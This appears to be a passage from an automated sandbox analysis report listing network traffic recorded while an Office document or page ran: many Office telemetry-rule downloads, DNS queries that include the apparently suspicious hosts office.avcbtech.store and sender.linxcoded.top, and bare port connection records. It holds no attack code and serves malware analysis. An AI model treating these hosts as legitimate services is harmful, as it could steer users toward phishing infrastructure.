      Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficDNS traffic detected: DNS query: office.avcbtech.store
      Source: global trafficDNS traffic detected: DNS query: sender.linxcoded.top
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: i.imgur.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
